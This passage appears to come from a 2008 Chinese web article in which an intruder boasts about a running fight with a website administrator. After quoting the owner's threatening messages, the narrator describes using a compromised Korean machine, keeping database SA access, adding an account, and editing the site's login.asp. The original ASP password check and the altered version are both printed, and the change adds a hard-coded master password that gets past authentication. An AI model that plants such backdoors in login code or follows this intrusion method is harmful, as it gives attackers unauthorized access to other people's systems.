黑客与网管的30天较量
2008-10-27 13:30:38 来源:WEB开发网用户xxxxxxxx请求你通过身份验证
附加消息:公安已经立案了 IP地址他们已经查到了 丢了2000多元卡
用户xxxxxxxx请求你通过身份验证
附加消息:这些钱 都是这个IP地址的人赔给我 公安已经保证过了
用户xxxxxxxx请求你通过身份验证
附加消息:还要另外赔给我电话费等100元 我胜利了:}
用户xxxxxxxx请求你通过身份验证
附加消息:你们的 世界末日し要到了
................
..............
............
###############
当时紧张了3秒,然后恢复平静,那站长说的是实话?还是恐吓之类的话,他不怕人家格他硬盘?
呵呵,怕他是小鸟,我们继续,换了一个韩国肉鸡,登陆他的终端,发现我的guest密码已经不对了。
还好,SA还能连得上去,还可以加用户,哈哈哈。马上加了一个用户,又上终端,在他的login.asp(登陆页面)找到这么一句,加了这么一句话:
if trim(rst("userpassword"))<>trim(md5(request("password"))) then
response.write("<script>alert('帐号或密码错误!请确认后再提交。');history.go(-1)</script>")
response.end
end if
这是登陆验证页面,我在这句代码了做了些手脚,把代码改成:
if trim(rst("userpassword"))<>trim(md5(request("password"))) then
password1=request("password")
if password1<>"shijiemori" then
response.write("<script>alert('帐号或密码错误!请确认后再提交。 (Err=0103)');history.go(-1)</script>")
response.end
end if
end if
更多精彩
赞助商链接